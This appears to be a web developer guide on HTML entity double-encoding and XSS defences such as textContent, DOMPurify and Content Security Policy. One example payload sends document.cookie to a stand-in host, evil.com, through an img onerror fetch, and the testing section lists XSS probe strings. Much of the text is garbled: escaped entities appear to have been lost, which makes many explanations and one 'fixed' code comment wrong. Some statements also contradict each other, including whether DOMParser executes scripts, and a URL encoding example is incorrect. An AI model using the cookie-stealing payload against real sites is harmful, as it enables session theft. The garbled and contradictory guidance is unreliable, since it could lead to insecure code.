HTML Entity Encoding Errors: Fixing Display Bugs and XSS Vulnerabilities
Quick answer
💡HTML entities like &lt; appearing as literal text instead of < means double-encoding: the string was encoded twice. Set element.textContent (not innerHTML) to display user input safely without XSS risk. Use DOMParser or a DOM element to decode HTML entities in JavaScript. React automatically escapes {expressions}, so only dangerouslySetInnerHTML requires manual sanitization.
Error symptoms
- ✕
Page displays &lt; or &amp; literally instead of < or & - ✕
Apostrophes appear as ' or ' in rendered text that should show as ' - ✕
HTML tags appear as visible text (<b>) instead of bold formatting - ✕
User-submitted content with special characters shows garbled output in some browsers - ✕
XSS vulnerability: script tags in user input executing as JavaScript - ✕
Email template renders literally instead of non-breaking space on some clients
Common causes
- •Double-encoding: calling an HTML escape function on already-escaped content
- •Using innerHTML to insert user content without sanitization, enabling XSS
- •Confusing HTML entity encoding with URL percent-encoding and applying the wrong one
- •Template engine auto-escaping combined with manual pre-escaping, causing double encoding
- •Not decoding HTML entities before displaying stored content in a text context (email body, PDF)
- •Using numeric entities (') in XML contexts that only recognize named entities
When it happens
- •When displaying user-generated content from a database where content was stored with HTML encoding
- •When a template engine like Handlebars, Mustache, or Jinja2 auto-escapes values that are already escaped
- •When rendering content inside a React component using dangerouslySetInnerHTML
- •When converting HTML content to plain text for email subjects or push notifications
- •When building a rich text editor that stores HTML and must sanitize before rendering
Examples and fixes
Using textContent prevents XSS by treating the value as plain text. Using innerHTML with user input is an XSS vulnerability.
Safely displaying user content: textContent vs innerHTML
❌ Wrong
// Wrong: XSS vulnerability — user input inserted as HTML
function displayUserComment(comment) {
const div = document.createElement('div');
div.innerHTML = comment; // <script>alert(1)</script> executes!
document.getElementById('comments').appendChild(div);
}
// Attacker submits: <img src=x onerror="fetch('https://evil.com?c='+document.cookie)">
// The onerror handler fires and sends the user's cookies✅ Fixed
// Correct: textContent treats the value as plain text, never HTML
function displayUserComment(comment) {
const div = document.createElement('div');
div.textContent = comment; // safe: all characters displayed literally
document.getElementById('comments').appendChild(div);
}
// For rich text with allowed formatting, use DOMPurify:
import DOMPurify from 'dompurify';
function displayRichComment(html) {
const div = document.createElement('div');
div.innerHTML = DOMPurify.sanitize(html, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
ALLOWED_ATTR: ['href']
});
document.getElementById('comments').appendChild(div);
}element.innerHTML parses the assigned string as HTML, executing any script tags, event handlers, or other JavaScript-carrying constructs within it. element.textContent treats the entire string as a text node, converting < to < and & to & automatically, so no HTML is ever interpreted. This is the primary defense against stored and reflected XSS in vanilla JavaScript. For cases where you must allow some HTML formatting (bold, links), use the DOMPurify library (npm: dompurify) which uses an allowlist to remove dangerous tags and attributes while preserving safe formatting. Never build your own HTML sanitizer with regex — it is extremely difficult to cover all attack vectors.
When a template engine auto-escapes and you also manually escape, output shows &lt; instead of <.
Fixing double-encoded HTML entities in template output
❌ Wrong
// Server: manually escaping before passing to Handlebars
const he = require('he');
const Handlebars = require('handlebars');
const template = Handlebars.compile('<p>{{content}}</p>');
const userInput = '<script>alert(1)</script>';
// Double encoding: he.encode() + Handlebars auto-escape
const escaped = he.encode(userInput); // <script>alert(1)</script>
const html = template({ content: escaped });
// Output: <p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
// Browser shows: <script>alert(1)</script> — wrong✅ Fixed
const Handlebars = require('handlebars');
const template = Handlebars.compile('<p>{{content}}</p>');
const userInput = '<script>alert(1)</script>';
// Let Handlebars auto-escape handle it — do NOT pre-escape
const html = template({ content: userInput });
// Output: <p><script>alert(1)</script></p>
// Browser shows: <script>alert(1)</script> — correct literal text
// If you need to render trusted HTML: use triple braces {{{html}}}
// But only for trusted, pre-sanitized HTML contentHandlebars' {{variable}} syntax automatically HTML-encodes the value: < becomes <, & becomes &, and so on. If you also run he.encode() (or any other escaping function) on the value before passing it to the template, each special character gets encoded twice. The first pass converts < to <. The second pass (Handlebars) converts the & in < to &, producing &lt;. The browser then decodes &lt; to < and displays it as literal text rather than as an angle bracket. The fix is to let exactly one layer perform the escaping. With Handlebars, the template does it — pass the raw value. With triple braces {{{variable}}}, Handlebars skips escaping, so you must sanitize before passing.
Why HTML entity encoding errors occur
HTML entity encoding exists because the HTML specification reserves certain characters for markup syntax. The five characters that must always be escaped in HTML text content are: < (less-than, starts a tag), > (greater-than, ends a tag), & (ampersand, starts an entity), " (double quote, used in attribute values), and ' (apostrophe, used in attribute values). HTML entities provide a way to include these characters as literal text: < for <, > for >, & for &, " for ", and ' or ' for '.
Double-encoding is the most common display bug. It happens when HTML entities are encoded more than once. The string 'Tom & Jerry' correctly encodes to 'Tom & Jerry' after one round of encoding. If encoded again, & becomes &amp;, producing 'Tom &amp; Jerry', which the browser displays as 'Tom & Jerry' — with the literal characters & visible on screen instead of &. This usually happens when template engines auto-escape values that were already manually escaped, or when content is stored in escaped form in a database and then escaped again when rendering.
XSS (Cross-Site Scripting) is the security consequence of insufficient HTML encoding. When user-supplied content is inserted into a page's HTML without escaping, an attacker can inject JavaScript that executes in the victim's browser. A stored XSS attack stores the malicious script in the database; every user who views the content triggers the script. A reflected XSS attack includes the script in a URL parameter; clicking the link executes the script in the victim's session. Both are prevented by consistently escaping user content at render time.
Numeric vs named HTML entities introduce compatibility issues. Named entities like (non-breaking space) and © (copyright symbol) are supported in HTML but not in XML. XHTML documents, SVG files, and XML-based email templates only support the five predefined XML entities: <, >, &, ", and '. If you use in an SVG file or XML document, the parser will throw 'undefined entity' errors. Use   (numeric decimal) or   (numeric hex) for the non-breaking space in XML contexts.
Diagnosing HTML entity encoding bugs
When entity text like & or < appears literally on the page, right-click and inspect the element in browser devtools. Look at the actual HTML source vs the rendered text. If the DOM shows &amp; (four characters followed by a semicolon), the content has been double-encoded. If the DOM shows & but it is displaying as & in the browser, that is correct behavior — the browser is decoding it. Only if & appears as literal text on screen (showing the six characters &, a, m, p, ;) is there a bug.
For XSS vulnerability diagnosis, test by inserting the string <script>alert('XSS')</script> into every user input field. If an alert box appears when the page is loaded (stored XSS) or when you submit and view the page (reflected XSS), the input is not being escaped. For more targeted testing, try the string " onmouseover="alert(1) in an input that appears in an HTML attribute context — if hovering triggers an alert, attribute encoding is missing. Use OWASP's XSS testing guide for a complete checklist.
For JavaScript code that renders HTML, check every assignment to innerHTML, outerHTML, and insertAdjacentHTML. Each of these can execute JavaScript if the assigned value contains event handlers or script tags. Search the codebase for these properties: grep -r 'innerHTML\|outerHTML\|insertAdjacentHTML' src/. Verify each usage either uses a trusted, sanitized string or is replaced with textContent.
For React applications, check every use of dangerouslySetInnerHTML. React auto-escapes all {expressions} in JSX, but dangerouslySetInnerHTML bypasses this protection. Also check for string concatenation with user data in template literals that are then passed to innerHTML in vanilla JS code embedded in useEffect or event handlers.
Fixing HTML entity encoding issues correctly
For displaying plain text content from users, always use element.textContent in vanilla JavaScript or text interpolation {value} in React JSX. Both automatically escape < to < and & to &, so no manual escaping is needed. This is the safest approach because it treats all content as text, never as markup.
For decoding HTML entities in JavaScript (reading encoded text to display in a non-HTML context like a textarea value or plain text email), use a DOM element as a decoder: const el = document.createElement('textarea'); el.innerHTML = encodedString; const decoded = el.value. This works because assigning to innerHTML parses the entities, and reading .value returns the decoded plain text. A textarea is used instead of a div to avoid executing script tags. In Node.js, the 'he' package provides he.decode() for server-side entity decoding without a DOM.
For server-side template engines, know whether your template auto-escapes by default and never manually escape before passing to an auto-escaping template. In Handlebars, {{variable}} auto-escapes; {{{variable}}} does not. In Jinja2/Nunjucks, {{ variable }} auto-escapes when autoescaping is enabled. In EJS, <%= variable %> auto-escapes; <%- variable %> does not. The pattern is: raw data in, template handles escaping.
For React, dangerouslySetInnerHTML must only receive sanitized HTML. Use DOMPurify (client-side) or the sanitize-html npm package (both client and server) with an explicit allowlist of permitted tags and attributes. Do not write your own sanitizer or use regex to strip tags — both approaches miss attack vectors like malformed HTML, SVG event handlers, and JavaScript in CSS.
For email templates with HTML entities, test across multiple email clients: Gmail, Outlook (2016-2022), Apple Mail, and the AOL/Yahoo webmail clients. Outlook uses Microsoft Word as its HTML rendering engine, which has different entity support than browser HTML parsers. For maximum compatibility, use numeric entities (  for non-breaking space) rather than named entities, and test with Litmus or Email on Acid.
Attribute encoding, SVG context, and React edge cases
HTML attribute encoding requires different treatment than text content encoding. In an HTML attribute value like <input value="{userInput}">, the characters that must be escaped differ depending on whether the attribute is quoted (double quotes, single quotes) or unquoted. For maximum safety, always quote attributes and escape &, ", <, >, and / in the attribute value. Setting element.setAttribute('value', userInput) in JavaScript handles this automatically — the DOM API escapes attribute values. Constructing HTML strings with template literals for attribute values is dangerous without careful escaping.
SVG inline in HTML has a dual-context problem. SVG attributes can contain JavaScript via event handlers like onclick="evil()" and via href="javascript:...". A sanitizer that is safe for HTML may not be safe for inline SVG, because SVG has additional event attributes that are specific to SVG elements (like onbegin, onrepeat). DOMPurify with {USE_PROFILES: {svg: true}} handles SVG sanitization correctly. If you are embedding user-controlled SVG, this specific option is required.
React's auto-escaping applies to JSX expressions like {value} and to HTML attributes set via JSX props like className={value}. However, it does not protect href attributes when the value is a javascript: URL. React will render <a href={userUrl}> without escaping, and if userUrl is 'javascript:alert(1)', clicking the link executes JavaScript. Validate href values to ensure they start with 'http://', 'https://', or '/' before using them in anchor tags. In React 17+, a warning is logged for javascript: URLs, but they are not blocked.
DOMParser provides a clean API for parsing HTML strings in modern browsers. const doc = new DOMParser().parseFromString(htmlString, 'text/html'); const text = doc.body.textContent strips all HTML tags and returns plain text with entities decoded. This is useful for converting HTML-formatted API responses to plain text for use in alt attributes, page titles, or notification messages. Unlike the textarea trick, DOMParser does not execute scripts.
Common HTML encoding mistakes in modern applications
Sanitizing with regex is one of the most persistent mistakes in web security. Developers write patterns like str.replace(/<script>/gi, '') or str.replace(/<[^>]+>/g, '') thinking they strip all dangerous HTML. These patterns are defeated by incomplete tags (<scr<script>ipt>), alternative capitalization, JavaScript in non-script contexts (<img src=x onerror=...>), and HTML entity obfuscation (javascript). Use DOMPurify, sanitize-html, or a CSP header, not regex.
Mixing encoding contexts within a single string is a common source of both display bugs and security vulnerabilities. For example, constructing a JavaScript string that is then inserted into an HTML attribute that is then evaluated as CSS — each context has different encoding requirements, and a mistake in any layer allows injection. The principle of context-appropriate encoding: escape for the innermost context first, then the outer contexts. String in JavaScript string literal: escape \' and \. JavaScript in HTML attribute: encode the result for HTML attributes. This nesting must be handled correctly at each layer.
Not encoding special characters in JSON that will be embedded in an HTML script tag is a classic vulnerability. If server-side code renders JSON data directly into a script block: <script>var data = {{{json}}}</script>, and the JSON contains </script>, the string terminates the script block prematurely. The safe pattern is to replace < with \u003C, > with \u003E, and & with \u0026 in JSON that will appear inside a script tag. The JSON.parse() call in the script still works, but the </script> sequence in the JSON no longer terminates the HTML script block.
Confusing entity encoding with URL encoding is a common category error. & is an HTML entity for &. %26 is the URL percent-encoding for &. They are different encodings for different contexts. A URL in an HTML href attribute needs the URL percent-encoded first, then the result HTML-encoded: href="/search?q=Tom%20%26amp%3B%20Jerry" is the correctly double-encoded version of /search?q=Tom & Jerry in an HTML attribute. Mixing them — using %26 in an HTML text node or & in a URL query string — produces incorrect output.
Best practices for HTML encoding in web applications
Adopt a context-sensitive output encoding strategy. The OWASP Cheat Sheet defines six encoding contexts: HTML text content, HTML attribute values, JavaScript strings, CSS values, URL parameters, and URL paths. Each context has different dangerous characters and different escaping requirements. A security-conscious framework like React handles the first three automatically in JSX. For the others, use library functions: encodeURIComponent() for URL parameters, CSS.escape() for CSS selectors, and JSON.stringify() for JavaScript values.
Implement a Content Security Policy (CSP) header as a defense-in-depth measure. CSP restricts which scripts, styles, and other resources a page can load. A strict CSP like Content-Security-Policy: default-src 'self'; script-src 'self' prevents inline script injection even if XSS encoding is missed somewhere. Start with a report-only mode (Content-Security-Policy-Report-Only) to see what would be blocked before enforcing. Nonce-based CSP (adding a random nonce per request to allowed scripts) is more flexible than hash-based CSP for dynamic applications.
For rich text editors (Quill, TipTap, Slate, CKEditor), always sanitize the HTML output on the server before storing and again before rendering. Client-side sanitization is a convenience, not a security control — attackers can bypass it by sending requests directly to your API without going through the browser. The server must validate and sanitize all HTML before storage. Use a configurable library with an explicit allowlist of permitted tags, attributes, and CSS properties.
Test your encoding with a comprehensive set of XSS payloads. The OWASP XSS Filter Evasion Cheat Sheet provides hundreds of attack vectors that bypass naive sanitization. The key insight is that HTML parsers in browsers are extremely permissive — they accept malformed, partial, and creative HTML that no spec-compliant parser would. Security testing with a handful of <script> tags is insufficient; use an automated scanner like OWASP ZAP or Burp Suite's active scan for thorough XSS testing.
Quick fix checklist
- ✓Replace innerHTML assignments with textContent for any user-supplied text content
- ✓Check for double-encoding: inspect the DOM for &lt; or &amp; patterns
- ✓Use DOMPurify or sanitize-html for rich HTML content — never regex-based sanitization
- ✓Verify React dangerouslySetInnerHTML uses DOMPurify-sanitized content only
- ✓Validate href values to reject javascript: URLs before using in anchor tags
- ✓Use numeric entities ( ) in XML/SVG contexts instead of named entities ( )
- ✓Set Content-Security-Policy header as defense-in-depth against XSS
- ✓Never manually escape before passing to a template engine that auto-escapes
Related guides
Frequently asked questions
Why does my page show &lt; instead of <
Your content has been double-encoded. The string < was first encoded to <, then encoded again, converting the & in < to &, producing &lt;. This typically happens when content is manually escaped before being passed to a template engine that also auto-escapes. Fix by removing the manual escaping step and letting the template engine handle it exactly once.
What is the difference between textContent and innerHTML?
textContent sets or gets the plain text content of an element, treating all characters as literal text — < is stored as < and displayed as < without interpretation. innerHTML parses the assigned string as HTML, executing event handlers and interpreting tags. For displaying user-supplied content, always use textContent. innerHTML should only receive trusted, sanitized HTML from controlled sources.
Does React automatically prevent XSS?
React automatically escapes values in JSX expressions {value} and JSX attributes, preventing most XSS. However, it does not protect dangerouslySetInnerHTML, href attributes with javascript: URLs, or DOM manipulation via useRef and direct DOM API calls (element.innerHTML = ...). React's protection applies to JSX rendering only. Always sanitize HTML passed to dangerouslySetInnerHTML using DOMPurify.
How do I decode HTML entities in JavaScript?
Create a textarea element, set its innerHTML to the encoded string, then read its value: const el = document.createElement('textarea'); el.innerHTML = encodedString; return el.value. The browser decodes entities when parsing innerHTML, and reading .value returns the plain text. In Node.js, use the he package: he.decode(encodedString). Avoid using DOMParser for entity decoding on untrusted input since it can execute scripts.
What HTML entities must always be escaped in text content?
In HTML text content (between tags), you must escape & as & and < as <. The > character is technically safe in text content but is conventionally escaped as >. In attribute values, you must also escape " as " (in double-quoted attributes) or ' as ' or ' (in single-quoted attributes). Modern HTML serializers escape all five to be safe in all contexts.
Why does ' not work in some contexts?
' (apostrophe entity) is defined in HTML5 but was not in HTML4. XML defines it, but XHTML 1.0 Strict does not include it in its entity set. In HTML email templates rendered by Outlook (which uses a Word-based HTML engine), ' may appear literally. For maximum compatibility across email clients and legacy browsers, use ' (decimal) or ' (hex) for the apostrophe character.
Can I safely use DOMParser to strip HTML tags?
Yes, new DOMParser().parseFromString(html, 'text/html').body.textContent strips all HTML tags and decodes entities, returning plain text. This is safe for extracting text from trusted HTML (e.g., converting your own HTML email templates to plain text). For untrusted user-supplied HTML, use DOMPurify first to sanitize, then optionally use textContent to extract plain text. DOMParser in a browser does not execute script tags.
What is a Content Security Policy and how does it help?
Content Security Policy (CSP) is an HTTP response header that declares which scripts, stylesheets, and other resources a page may load. A strict CSP like script-src 'self' prevents the browser from executing inline scripts and scripts from untrusted origins, significantly limiting XSS impact even if an injection vulnerability exists. CSP is a defense-in-depth measure — it does not replace proper HTML encoding, but it limits what an attacker can do if encoding is missed somewhere.
All tools run in your browser. Your data never leaves your device. Last updated: 2026-05-06.